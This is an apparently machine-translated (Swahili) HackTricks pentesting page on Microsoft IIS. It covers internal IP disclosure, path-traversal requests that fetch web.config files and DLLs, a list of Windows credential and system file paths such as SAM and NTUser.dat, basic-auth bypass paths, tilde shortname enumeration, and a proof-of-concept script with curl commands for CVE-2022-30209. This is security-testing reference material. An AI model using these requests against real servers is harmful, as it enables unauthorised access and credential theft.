maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md

265 lines
13 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# IIS - Internet Information Services
{{#include ../../banners/hacktricks-training.md}}
Jaribu upanuzi wa faili zinazoweza kutekelezwa:
- asp
- aspx
- config
- php
## Ufunuo wa Anwani ya IP ya Ndani
Katika seva yoyote ya IIS ambapo unapata 302 unaweza kujaribu kuondoa kichwa cha Host na kutumia HTTP/1.0 na ndani ya jibu kichwa cha Location kinaweza kukuongoza kwenye anwani ya IP ya ndani:
```
nc -v domain.com 80
openssl s_client -connect domain.com:443
```
Majibu yanayofichua IP ya ndani:
```
GET / HTTP/1.0
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```
## Execute .config files
Unaweza kupakia faili za .config na kuzitumia kutekeleza msimbo. Njia moja ya kufanya hivyo ni kuongeza msimbo mwishoni mwa faili ndani ya maoni ya HTML: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
Taarifa zaidi na mbinu za kutumia udhaifu huu [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
## IIS Discovery Bruteforce
Pakua orodha niliyounda:
{{#file}}
iisfinal.txt
{{#endfile}}
Ilianzishwa kwa kuunganisha maudhui ya orodha zifuatazo:
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
Tumia bila kuongeza kiambatisho chochote, faili zinazohitaji zina tayari.
## Path Traversal
### Leaking source code
Angalia andiko kamili katika: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
> [!NOTE]
> Kwa muhtasari, kuna faili kadhaa za web.config ndani ya folda za programu zikiwa na viungo kwa faili za "**assemblyIdentity**" na "**namespaces**". Kwa taarifa hii inawezekana kujua **mahali ambapo executable ziko** na kuzipakua.\
> Kutoka kwa **Dlls zilizopakuliwa** pia inawezekana kupata **namespaces mpya** ambapo unapaswa kujaribu kufikia na kupata faili ya web.config ili kupata namespaces mpya na assemblyIdentity.\
> Pia, faili **connectionstrings.config** na **global.asax** zinaweza kuwa na taarifa za kuvutia.\\
Katika **.Net MVC applications**, faili ya **web.config** ina jukumu muhimu kwa kuainisha kila faili la binary ambalo programu inategemea kupitia lebo za XML za **"assemblyIdentity"**.
### **Exploring Binary Files**
Mfano wa kufikia faili ya **web.config** umeonyeshwa hapa chini:
```markup
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
```
Hii ombi inadhihirisha mipangilio na utegemezi mbalimbali, kama vile:
- **EntityFramework** toleo
- **AppSettings** kwa ajili ya kurasa za wavuti, uthibitishaji wa mteja, na JavaScript
- **System.web** mipangilio ya uthibitishaji na wakati wa kukimbia
- **System.webServer** mipangilio ya moduli
- **Runtime** uhusiano wa mkusanyiko kwa maktaba nyingi kama **Microsoft.Owin**, **Newtonsoft.Json**, na **System.Web.Mvc**
Mipangilio hii inaonyesha kwamba faili fulani, kama **/bin/WebGrease.dll**, ziko ndani ya folda ya /bin ya programu.
### **Faili za Saraka Kuu**
Faili zinazopatikana katika saraka kuu, kama **/global.asax** na **/connectionstrings.config** (ambayo ina nywila nyeti), ni muhimu kwa usanidi na uendeshaji wa programu.
### **Namespaces na Web.Config**
Programu za MVC pia zinafafanua **web.config files** za ziada kwa ajili ya namespaces maalum ili kuepuka matamko yanayojirudia katika kila faili, kama inavyoonyeshwa na ombi la kupakua **web.config** nyingine:
```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
```
### **Kushusha DLLs**
Kurejelea jina la kawaida la kawaida kunaashiria DLL inayoitwa "**WebApplication1**" iliyopo katika saraka ya /bin. Kufuatia hii, ombi la kushusha **WebApplication1.dll** linaonyeshwa:
```markup
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
```
Hii inaonyesha uwepo wa DLL nyingine muhimu, kama **System.Web.Mvc.dll** na **System.Web.Optimization.dll**, katika saraka ya /bin.
Katika hali ambapo DLL inapata namespace inayoitwa **WebApplication1.Areas.Minded**, mshambuliaji anaweza kudhani uwepo wa faili nyingine za web.config katika njia zinazoweza kutabiriwa, kama **/area-name/Views/**, zikiwa na mipangilio maalum na marejeleo kwa DLL nyingine katika folda ya /bin. Kwa mfano, ombi kwa **/Minded/Views/web.config** linaweza kufichua mipangilio na namespaces zinazoashiria uwepo wa DLL nyingine, **WebApplication1.AdditionalFeatures.dll**.
### Faili za kawaida
Kutoka [hapa](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
```
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
```
## HTTPAPI 2.0 404 Error
Ikiwa unaona kosa kama hili:
![](<../../images/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
Inamaanisha kwamba seva **haikupata jina sahihi la kikoa** ndani ya kichwa cha Host.\
Ili kufikia ukurasa wa wavuti unaweza kuangalia **Cheti cha SSL** kilichotolewa na labda unaweza kupata jina la kikoa/subdomain huko. Ikiwa halipo unaweza kuhitaji **kujaribu VHosts** hadi upate sahihi.
## Old IIS vulnerabilities worth looking for
### Microsoft IIS tilde character “\~” Vulnerability/Feature Short File/Folder Name Disclosure
Unaweza kujaribu **kuorodhesha folda na faili** ndani ya kila folda iliyogunduliwa (hata kama inahitaji Msingi wa Uthibitishaji) ukitumia hii **mbinu**.\
Kikomo kikuu cha mbinu hii ikiwa seva ina udhaifu ni kwamba **inaweza tu kupata hadi herufi 6 za kwanza za jina la kila faili/folda na herufi 3 za kwanza za kiendelezi** cha faili.
Unaweza kutumia [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) kujaribu udhaifu huu:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
![](<../../images/image (844).png>)
Utafiti wa asili: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf)
Unaweza pia kutumia **metasploit**: `use scanner/http/iis_shortname_scanner`
Wazo zuri la **kupata jina la mwisho** la faili zilizogunduliwa ni **kuuliza LLMs** kwa chaguzi kama inavyofanywa katika skripti [https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py](https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py)
### Basic Authentication bypass
**Bypass** uthibitishaji wa msingi (**IIS 7.5**) ukijaribu kufikia: `/admin:$i30:$INDEX_ALLOCATION/admin.php` au `/admin::$INDEX_ALLOCATION/admin.php`
Unaweza kujaribu **kuchanganya** udhaifu huu na wa mwisho ili kupata **folda** mpya na **kuepuka** uthibitishaji.
## ASP.NET Trace.AXD enabled debugging
ASP.NET inajumuisha hali ya ufuatiliaji na faili yake inaitwa `trace.axd`.
Inahifadhi kumbukumbu ya kina ya maombi yote yaliyofanywa kwa programu kwa kipindi cha muda.
Taarifa hii inajumuisha IP za mteja wa mbali, vitambulisho vya kikao, vidakuzi vyote vya maombi na majibu, njia za kimwili, taarifa za msimbo wa chanzo, na labda hata majina ya watumiaji na nywila.
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)
## ASPXAUTH Cookie
ASPXAUTH inatumia taarifa zifuatazo:
- **`validationKey`** (string): ufunguo wa hex-encoded wa kutumia kwa uthibitishaji wa saini.
- **`decryptionMethod`** (string): (default “AES”).
- **`decryptionIV`** (string): hex-encoded initialization vector (inategemea vector ya sifuri).
- **`decryptionKey`** (string): ufunguo wa hex-encoded wa kutumia kwa ufichuzi.
Hata hivyo, watu wengine watachukua **thamani za msingi** za vigezo hivi na watatumia kama **cookie barua pepe ya mtumiaji**. Hivyo, ikiwa unaweza kupata wavuti inayotumia **jukwaa sawa** linalotumia cookie ya ASPXAUTH na **uunde mtumiaji kwa barua pepe ya mtumiaji unayependa kuiga** kwenye seva inayoshambuliwa, unaweza kuwa na uwezo wa **kutumia cookie kutoka seva ya pili kwenye ya kwanza** na kuiga mtumiaji.\
Shambulio hili lilifanya kazi katika [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
## IIS Authentication Bypass with cached passwords (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[Full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Kosa katika msimbo **halikupitia ipasavyo nenosiri lililotolewa na mtumiaji**, hivyo mshambuliaji ambaye **hash ya nenosiri lake inagonga ufunguo** ambao tayari uko kwenye **cache** ataweza kuingia kama mtumiaji huyo.
```python
# script for sanity check
> type test.py
def HashString(password):
j = 0
for c in map(ord, password):
j = c + (101*j)&0xffffffff
return j
assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')
# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized
# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink